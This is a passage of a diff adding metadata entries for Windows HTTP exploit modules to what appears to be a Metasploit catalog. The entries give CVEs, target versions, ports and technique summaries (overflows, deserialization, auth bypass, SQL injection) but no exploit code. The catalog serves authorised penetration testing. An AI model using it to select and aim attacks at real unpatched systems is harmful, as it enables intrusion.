arbitrary code.", + "references": [ + "CVE-2007-3614", + "OSVDB-37838", + "BID-24773" + ], + "platform": "Windows", + "arch": "", + "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "SAP DB 7.4 WebTools" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 
"/modules/exploits/windows/http/sapdb_webtools.rb", + "is_install_path": true, + "ref_name": "windows/http/sapdb_webtools", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/savant_31_overflow": { + "name": "Savant 3.1 Web Server Overflow", + "fullname": "exploit/windows/http/savant_31_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2002-09-10", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service\n supports a maximum of 10 threads (for a default install). Each exploit attempt\n generally causes a thread to die whether successful or not. Therefore, in a default\n configuration, you only have 10 chances.\n\n Due to the limited space available for the payload in this exploit module, use of the\n \"ord\" payloads is recommended.", + "references": [ + "CVE-2002-1120", + "OSVDB-9829", + "BID-5686", + "EDB-787" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Savant.exe", + "Windows 2000 Pro All - English", + "Windows 2000 Pro All - Italian", + "Windows 2000 Pro All - French", + "Windows XP Pro SP2 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/savant_31_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/savant_31_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sepm_auth_bypass_rce": { + "name": "Symantec Endpoint Protection Manager Authentication Bypass and Code Execution", + "fullname": "exploit/windows/http/sepm_auth_bypass_rce", + "aliases": [], + "rank": 
600, + "disclosure_date": "2015-07-31", + "type": "exploit", + "author": [ + "Markus Wulftange", + "bperry" + ], + "description": "This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager\n in order to achieve a remote shell on the box as NT AUTHORITY\\SYSTEM. The vulnerabilities\n include an authentication bypass, a directory traversal and a privilege escalation to\n get privileged code execution.", + "references": [ + "CVE-2015-1486", + "CVE-2015-1487", + "CVE-2015-1489", + "URL-http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html" + ], + "platform": "Windows", + "arch": "", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/sepm_auth_bypass_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/sepm_auth_bypass_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/serviio_checkstreamurl_cmd_exec": { + "name": "Serviio Media Server checkStreamUrl Command Execution", + "fullname": "exploit/windows/http/serviio_checkstreamurl_cmd_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-03", + "type": "exploit", + "author": [ + "Gjoko Krstic(LiquidWorm) ", + "bcoles " + ], + "description": "This module exploits an unauthenticated remote command execution vulnerability\n in the console component of Serviio Media Server versions 1.4 to 1.8 on\n Windows operating systems.\n\n The console service (on port 23423 by default) exposes a REST API which\n which does not require authentication.\n\n The 'action' API endpoint does not sufficiently sanitize user-supplied data\n in the 'VIDEO' parameter of the 'checkStreamUrl' method. 
This parameter is\n used in a call to cmd.exe resulting in execution of arbitrary commands.\n\n This module has been tested successfully on Serviio Media Server versions\n 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.", + "references": [ + "OSVDB-41961", + "PACKETSTORM-142387", + "URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php", + "URL-https://blogs.securiteam.com/index.php/archives/3094" + ], + "platform": "Windows", + "arch": "", + "rport": 23423, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/http/serviio_checkstreamurl_cmd_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/servu_session_cookie": { + "name": "Rhinosoft Serv-U Session Cookie Buffer Overflow", + "fullname": "exploit/windows/http/servu_session_cookie", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-11-01", + "type": "exploit", + "author": [ + "Nikolas Rangos ", + "M.Yanagishita ", + "jduck " + ], + "description": "This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.\n Sending a specially crafted POST request with an overly long session cookie\n string, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-4006", + "OSVDB-59772", + "URL-http://rangos.de/ServU-ADV.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2003 SP2 English (NX)", + "Windows 2000 SP4 and XP SP3 English (SEH)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/servu_session_cookie.rb", + 
"is_install_path": true, + "ref_name": "windows/http/servu_session_cookie", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sharepoint_data_deserialization": { + "name": "SharePoint DataSet / DataTable Deserialization", + "fullname": "exploit/windows/http/sharepoint_data_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-07-14", + "type": "exploit", + "author": [ + "Steven Seeley", + "Soroush Dalili", + "Spencer McIntyre" + ], + "description": "A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated\n attacker to execute code within the context of the SharePoint application service. The privileges in this\n execution context are determined by the account that is specified when SharePoint is installed and configured.\n The vulnerability is related to a failure to validate the source of XML input data, leading to an unsafe\n deserialization operation that can be triggered from a page that initializes either the\n ContactLinksSuggestionsMicroView type or a derivative of it. 
In a default configuration, a Domain User account\n is sufficient to access SharePoint and exploit this vulnerability.", + "references": [ + "CVE-2020-1147", + "URL-https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows EXE Dropper", + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/sharepoint_data_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_data_deserialization", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce": { + "name": "Sharepoint Dynamic Proxy Generator Unauth RCE", + "fullname": "exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-05-01", + "type": "exploit", + "author": [ + "Jang", + "jheysel-r7" + ], + "description": "This module exploits two vulnerabilities in Sharepoint 2019, an auth bypass CVE-2023-29357 which was patched\n in June of 2023 and CVE-2023-24955, an RCE which was patched in May of 2023.\n\n The auth bypass allows attackers to impersonate the Sharepoint Admin user. This vulnerability stems from the\n signature validation check used to verify JSON Web Tokens (JWTs) used for OAuth authentication. 
If the signing\n algorithm of the user-provided JWT is set to none, SharePoint skips the signature validation step due to a logic\n flaw in the ReadTokenCore() method.\n\n After impersonating the administrator user, the attacker has access to the Sharepoint API and is able to\n exploit CVE-2023-24955. This authenticated RCE vulnerability leverages the impersonated privileged account to\n replace the \"/BusinessDataMetadataCatalog/BDCMetadata.bdcm\" file in the webroot directory with a payload. The\n payload is then compiled and executed by Sharepoint allowing attackers to remotely execute commands via the API.", + "references": [ + "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-may-9-2023-kb5002389-e2b77a46-2946-495f-8948-8abdc44aacc3", + "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-june-13-2023-kb5002402-c5d58925-f7be-4d16-a61b-8ce871bbe34d", + "URL-https://testbnull.medium.com/p2o-vancouver-2023-v%C3%A0i-d%C3%B2ng-v%E1%BB%81-sharepoint-pre-auth-rce-chain-cve-2023-29357-cve-2023-24955-ed97dcab131e", + "CVE-2023-29357", + "CVE-2023-24955" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2024-02-15 09:26:54 +0000", + "path": "/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + 
"exploit_windows/http/sharepoint_ssi_viewstate": { + "name": "Microsoft SharePoint Server-Side Include and ViewState RCE", + "fullname": "exploit/windows/http/sharepoint_ssi_viewstate", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-10-13", + "type": "exploit", + "author": [ + "mr_me", + "wvu " + ], + "description": "This module exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.", + "references": [ + "CVE-2020-16952", + "URL-https://srcincite.io/advisories/src-2020-0022/", + "URL-https://srcincite.io/pocs/cve-2020-16952.py.txt", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_ssi_viewstate", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sharepoint_unsafe_control": { + "name": "Microsoft SharePoint 
Unsafe Control and ViewState RCE", + "fullname": "exploit/windows/http/sharepoint_unsafe_control", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-05-11", + "type": "exploit", + "author": [ + "Unknown", + "Spencer McIntyre", + "wvu " + ], + "description": "The EditingPageParser.VerifyControlOnSafeList method fails to properly validate user supplied data. This\n can be leveraged by an attacker to leak sensitive information in rendered-preview content. This module will\n leak the ViewState validation key and then use it to sign a crafted object that will trigger code execution\n when deserialized.\n\n Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.", + "references": [ + "CVE-2021-31181", + "ZDI-21-573", + "URL-https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/http/sharepoint_unsafe_control.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_unsafe_control", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sharepoint_workflows_xoml": { + "name": "SharePoint Workflows XOML Injection", + "fullname": "exploit/windows/http/sharepoint_workflows_xoml", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-03-02", + "type": "exploit", + "author": [ + "Spencer McIntyre", + 
"Soroush Dalili" + ], + "description": "This module exploits a vulnerability within SharePoint and its .NET backend\n that allows an attacker to execute commands using specially crafted XOML data\n sent to SharePoint via the Workflows functionality.", + "references": [ + "CVE-2020-0646", + "URL-https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows EXE Dropper", + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2023-02-08 15:20:32 +0000", + "path": "/modules/exploits/windows/http/sharepoint_workflows_xoml.rb", + "is_install_path": true, + "ref_name": "windows/http/sharepoint_workflows_xoml", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/shoutcast_format": { + "name": "SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow", + "fullname": "exploit/windows/http/shoutcast_format", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-12-23", + "type": "exploit", + "author": [ + "MC ", + "mandragore " + ], + "description": "This module exploits a format string vulnerability in the\n Nullsoft SHOUTcast server for Windows. The vulnerability is\n triggered by requesting a file path that contains format\n string specifiers. 
This vulnerability was discovered by\n Tomasz Trojanowski and Damian Put.", + "references": [ + "CVE-2004-1373", + "OSVDB-12585", + "BID-12096" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows NT SP5/SP6a English", + "Windows 2000 English ALL", + "Windows XP Pro SP0/SP1 English", + "Windows 2003 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/shoutcast_format.rb", + "is_install_path": true, + "ref_name": "windows/http/shoutcast_format", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/shttpd_post": { + "name": "SHTTPD URI-Encoded POST Request Overflow", + "fullname": "exploit/windows/http/shttpd_post", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-10-06", + "type": "exploit", + "author": [ + "LMH ", + "hdm ", + "skOd" + ], + "description": "This module exploits a stack buffer overflow in SHTTPD <= 1.34.\n The vulnerability is caused due to a boundary error within the\n handling of POST requests. 
Based on an original exploit by skOd\n but using a different method found by hdm.", + "references": [ + "CVE-2006-5216", + "OSVDB-29565", + "URL-http://shttpd.sourceforge.net", + "BID-20393" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows NT English SP5-SP6", + "Windows 2000 Spanish SP4", + "Windows 2000 French SP4", + "Windows 2000 English SP0-SP4", + "Windows 2000 French SP0-SP4", + "Windows 2003 Server English SP0-SP1", + "Windows XP German SP2", + "Windows XP German SP1", + "Windows XP English SP2", + "Windows XP English SP0-SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/shttpd_post.rb", + "is_install_path": true, + "ref_name": "windows/http/shttpd_post", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sitecore_xp_cve_2021_42237": { + "name": "Sitecore Experience Platform (XP) PreAuth Deserialization RCE", + "fullname": "exploit/windows/http/sitecore_xp_cve_2021_42237", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-11-02", + "type": "exploit", + "author": [ + "AssetNote", + "gwillcox-r7" + ], + "description": "This module exploits a deserialization vulnerability in the Report.ashx page\n of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7.\n Versions 7.2.6 and earlier and 9.0 and later are not affected.\n\n The vulnerability occurs due to Report.ashx's handler, located in Sitecore.Xdb.Client.dll\n under the Sitecore.sitecore.shell.ClientBin.Reporting.Report defintion, having a ProcessRequest()\n handler that calls ProcessReport() with the context of the attacker's request without properly\n checking if the attacker is authenticated or not.\n\n This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will\n end up calling the 
DeserializeParameters() function of\n Sitecore.Analytics.Reporting.ReportDataSerializer, if a \"parameters\" XML tag is found in\n the attacker's request.\n\n Then for each subelement named \"parameter\", the code will check that it has a name and\n if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is\n vulnerable to deserialization attacks and can be trivially exploited by using the\n TypeConfuseDelegate gadget chain.\n\n By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user\n that IIS is running as, aka NT AUTHORITY\\NETWORK SERVICE. Users can then use technique 4\n of the \"getsystem\" command to use RPCSS impersonation and get SYSTEM level code execution.", + "references": [ + "CVE-2021-42237", + "URL-https://blog.assetnote.io/2021/11/02/sitecore-rce/", + "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2021-11-11 23:56:11 +0000", + "path": "/modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb", + "is_install_path": true, + "ref_name": "windows/http/sitecore_xp_cve_2021_42237", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/sitecore_xp_cve_2025_27218": { + "name": "Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit", + "fullname": "exploit/windows/http/sitecore_xp_cve_2025_27218", + "aliases": [], + "rank": 600, + "disclosure_date": "2025-01-06", + 
"type": "exploit", + "author": [ + "Dylan Pindur", + "machang-r7" + ], + "description": "This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience\n Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.", + "references": [ + "CVE-2025-27218", + "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535", + "URL-https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218" + ], + "platform": "Windows", + "arch": "x86, x64, cmd", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "PowerShell Stager" + ], + "mod_time": "2025-03-27 09:36:10 +0000", + "path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb", + "is_install_path": true, + "ref_name": "windows/http/sitecore_xp_cve_2025_27218", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/smartermail_rce": { + "name": "SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution", + "fullname": "exploit/windows/http/smartermail_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-04-17", + "type": "exploit", + "author": [ + "Soroush Dalili", + "1F98D", + "Ismail E. Dawoodjee" + ], + "description": "This module exploits a vulnerability in the SmarterTools SmarterMail\n software for version numbers <= 16.x or for build numbers < 6985.\n The vulnerable versions and builds expose three .NET remoting endpoints\n on port 17001, namely /Servers, /Mail and /Spool. 
For example, a\n typical installation of SmarterMail Build 6970 will have the /Servers\n endpoint exposed to the public at tcp://0.0.0.0:17001/Servers, where\n serialized .NET commands can be sent through a TCP socket connection.\n\n The three endpoints perform deserialization of untrusted data\n (CVE-2019-7214), allowing an attacker to send arbitrary commands\n to be deserialized and executed. This module exploits this vulnerability\n to perform .NET deserialization attacks, allowing remote code execution\n for any unauthenticated user under the context of the SYSTEM account.\n Successful exploitation results in full administrative control of the\n target server under the NT AUTHORITY\\SYSTEM account.\n\n This vulnerability was patched in Build 6985, where the 17001 port is\n no longer publicly accessible, although it can be accessible locally\n at 127.0.0.1:17001. Hence, this would still allow for a privilege\n escalation vector if the server is compromised as a low-privileged user.", + "references": [ + "CVE-2019-7214", + "EDB-49216", + "URL-https://research.nccgroup.com/2019/04/16/technical-advisory-multiple-vulnerabilities-in-smartermail/" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 9998, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "x86/x64 Windows CmdStager" + ], + "mod_time": "2023-07-09 07:25:09 +0000", + "path": "/modules/exploits/windows/http/smartermail_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/smartermail_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/softing_sis_rce": { + "name": "Softing Secure 
Integration Server v1.22 Remote Code Execution", + "fullname": "exploit/windows/http/softing_sis_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-07-27", + "type": "exploit", + "author": [ + "Chris Anastasio (muffin) of Incite Team", + "Steven Seeley (mr_me) of Incite Team", + "Imran E. Dawoodjee " + ], + "description": "This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.\n\n In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the \"restore configuration\" feature to upload a zip file containing a path traversal file which is a dll called ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll. This causes the file C:\\Windows\\System32\\wbem\\wbemcomn.dll to be created and executed upon touching the disk.\n\n In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.\n\n The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.\n\n A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. 
Refer to the module documentation for more details.", + "references": [ + "CVE-2022-1373", + "CVE-2022-2334", + "ZDI-22-1154", + "ZDI-22-1156", + "URL-https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html", + "URL-https://ide0x90.github.io/softing-sis-122-rce/" + ], + "platform": "Windows", + "arch": "x64", + "rport": 8099, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows x64" + ], + "mod_time": "2024-04-19 23:05:02 +0000", + "path": "/modules/exploits/windows/http/softing_sis_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/softing_sis_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/solarwinds_fsm_userlogin": { + "name": "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability", + "fullname": "exploit/windows/http/solarwinds_fsm_userlogin", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-03-13", + "type": "exploit", + "author": [ + "rgod", + "mr_me ", + "sinn3r " + ], + "description": "This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager\n 6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface\n due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set\n the 'username' attribute before authentication. 
The second problem is that the settings-new.jsp\n file will only check the 'username' attribute before authorizing the 'uploadFile' action,\n which can be exploited and allows the attacker to upload a fake xls host list file to the\n server, and results in arbitrary code execution under the context of SYSTEM.\n\n Depending on the installation, by default the Change Advisor web server is listening on port\n 48080 for an express install. Otherwise, this service may appear on port 8080.\n\n Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip, noted in the\n references for this module.", + "references": [ + "CVE-2015-2284", + "OSVDB-81634", + "ZDI-15-107", + "URL-http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip" + ], + "platform": "Windows", + "arch": "", + "rport": 48080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Solarwinds Firewall Security Manager 6.6.5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb", + "is_install_path": true, + "ref_name": "windows/http/solarwinds_fsm_userlogin", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/solarwinds_storage_manager_sql": { + "name": "Solarwinds Storage Manager 5.1.0 SQL Injection", + "fullname": "exploit/windows/http/solarwinds_storage_manager_sql", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-12-07", + "type": "exploit", + "author": [ + "r ", + "muts", + "sinn3r " + ], + "description": "This module exploits a SQL injection found in Solarwinds Storage Manager\n login interface. 
It will send a malicious SQL query to create a JSP file\n under the web root directory, and then let it download and execute our malicious\n executable under the context of SYSTEM.", + "references": [ + "OSVDB-81634", + "EDB-18818", + "URL-http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html", + "URL-http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm" + ], + "platform": "Windows", + "arch": "", + "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Universal" + ], + "mod_time": "2021-02-18 09:18:19 +0000", + "path": "/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb", + "is_install_path": true, + "ref_name": "windows/http/solarwinds_storage_manager_sql", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/sonicwall_scrutinizer_sqli": { + "name": "Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection", + "fullname": "exploit/windows/http/sonicwall_scrutinizer_sqli", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-07-22", + "type": "exploit", + "author": [ + "muts", + "Devon Kearns", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Dell SonicWall Scrutinizer.\n While handling the 'q' parameter, the PHP application does not properly filter\n the user-supplied data, which can be manipulated to inject SQL commands, and\n then gain remote code execution. 
